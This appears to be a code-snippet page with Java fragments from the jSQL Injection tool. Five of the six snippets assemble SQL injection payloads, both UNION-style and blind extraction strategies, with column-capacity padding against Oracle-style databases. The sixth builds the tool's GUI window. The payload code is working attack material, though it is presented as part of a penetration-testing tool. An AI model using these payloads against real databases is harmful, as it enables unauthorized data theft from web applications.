Ejemplo n.º 1
0
 @Override
 public String performanceQuery(String[] indexes) {
   return MediatorModel.model()
       .initialQuery
       .replaceAll(
           "1337(" + ToolsString.join(indexes, "|") + ")7331",
           /** rpad 1024 (not 65536) to avoid error 'result of string concatenation is too long' */
           "(SELECT+TO_CHAR("
               + "(SELECT*"
               + "FROM"
               + "(SELECT'SQLi$1'"
               + "||SUBSTR("
               + "(SELECT+utl_raw.cast_to_varchar2(CAST(DBMS_LOB.SUBSTR(REPLACE(REPLACE(XmlAgg(XmlElement(\"a\",rawtohex("
               + "s"
               + "))"
               + "ORDER+BY+s+nulls+last).getClobVal(),'<a>',''),'<%2fa>',rawtohex('6'))"
               + "||rawtohex('1337'),4000,1)AS+VARCHAR(1024)))"
               + "FROM"
               + "(SELECT+DISTINCT+rpad('%23',1024,'%23')s+FROM+dual"
               + ")"
               + "),1,3996)"
               + "FROM+dual"
               + ")x"
               + "))"
               + "FROM+dual)");
 }
Ejemplo n.º 2
0
 @Override
 public String getIndicesCapacity(String[] indexes) {
   return MediatorModel.model()
       .initialQuery
       .replaceAll(
           "1337(" + ToolsString.join(indexes, "|") + ")7331",
           "('SQLi'||$1||repeat('%23',1024)||'iLQS')");
 }
Ejemplo n.º 3
0
 @Override
 public String getIndicesCapacity(String[] indexes) {
   return MediatorModel.model()
       .initialQuery
       .replaceAll(
           "1337(" + ToolsString.join(indexes, "|") + ")7331",
           "(select'SQLi$1'||rpad('%23',1024,'%23',1025)||'iLQS'from+dual)");
 }
Ejemplo n.º 4
0
 @Override
 public String normalStrategy(String sqlQuery, String startPosition) {
   return "select'SQLi'||substr(r,"
       + startPosition
       + ","
       +
       /** Minus 'SQLi' should apply */
       MediatorModel.model().normalStrategy.getPerformanceLength()
       + ")from("
       + sqlQuery
       + ")x";
 }
Ejemplo n.º 5
0
 @Override
 public String blindStrategy(String sqlQuery, String startPosition) {
   return "("
       + "select+"
       + ""
       + "'SQLi'||"
       + "substr("
       + "("
       + sqlQuery
       + "),"
       + startPosition
       + ","
       + MediatorModel.model().performanceLength
       + ")from+dual"
       + ""
       + ")";
 }
Ejemplo n.º 6
0
  /** Build the GUI: add app icon, tree icons, the 3 main panels. */
  public JFrameGUI() {
    super("jSQL Injection");

    MediatorGUI.register(this);
    MediatorModel.model().addObserver(this);

    // Define a small and large app icon
    this.setIconImages(HelperGUI.getIcons());

    // Load UI before any component
    HelperGUI.prepareGUI();
    ShadowPopupFactory.install();

    // Save controller
    MediatorGUI.register(new Menubar());
    this.setJMenuBar(MediatorGUI.menubar());

    // Define the default panel: each component on a vertical line
    this.getContentPane().setLayout(new BoxLayout(this.getContentPane(), BoxLayout.PAGE_AXIS));

    // Textfields at the top
    MediatorGUI.register(new PanelTop());
    this.add(MediatorGUI.top());

    // Main panel for tree ans tables in the middle
    JPanel mainPanel = new JPanel(new GridLayout(1, 0));
    this.outputPanel = new PanelLeftRightBottom();
    mainPanel.add(this.outputPanel);
    this.add(mainPanel);

    MediatorGUI.gui()
        .addWindowListener(
            new WindowAdapter() {
              @Override
              public void windowClosing(WindowEvent e) {
                Preferences prefs = Preferences.userRoot().node(InjectionModel.class.getName());
                prefs.putInt(
                    PanelLeftRightBottom.VERTICALSPLITTER_PREFNAME,
                    JFrameGUI.this.outputPanel.leftRight.getDividerLocation());
                prefs.putInt(
                    PanelLeftRightBottom.HORIZONTALSPLITTER_PREFNAME,
                    JFrameGUI.this.outputPanel.getHeight()
                        - JFrameGUI.this.outputPanel.getDividerLocation());

                prefs.putBoolean(HelperGUI.BINARY_VISIBLE, false);
                prefs.putBoolean(HelperGUI.CHUNK_VISIBLE, false);
                prefs.putBoolean(HelperGUI.NETWORK_VISIBLE, false);
                prefs.putBoolean(HelperGUI.JAVA_VISIBLE, false);

                for (int i = 0; i < MediatorGUI.bottom().getTabCount(); i++) {
                  if ("Binary".equals(MediatorGUI.bottom().getTitleAt(i))) {
                    prefs.putBoolean(HelperGUI.BINARY_VISIBLE, true);
                  } else if ("Chunk".equals(MediatorGUI.bottom().getTitleAt(i))) {
                    prefs.putBoolean(HelperGUI.CHUNK_VISIBLE, true);
                  } else if ("Network".equals(MediatorGUI.bottom().getTitleAt(i))) {
                    prefs.putBoolean(HelperGUI.NETWORK_VISIBLE, true);
                  } else if ("Java".equals(MediatorGUI.bottom().getTitleAt(i))) {
                    prefs.putBoolean(HelperGUI.JAVA_VISIBLE, true);
                  }
                }
              }
            });

    // Info on the bottom
    MediatorGUI.register(new PanelStatusbar());
    this.add(MediatorGUI.status());

    // Reduce size of components
    this.pack(); // nécessaire après le masquage des param proxy

    // Size of window
    this.setSize(1024, 768);
    this.setVisible(true);
    this.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);

    // Center the window
    this.setLocationRelativeTo(null);

    // Define the keyword shortcuts for tabs #Need to work even if the focus is not on tabs
    ActionHandler.addShortcut(this.getRootPane(), MediatorGUI.right());
    ActionHandler.addTextFieldShortcutSelectAll();
  }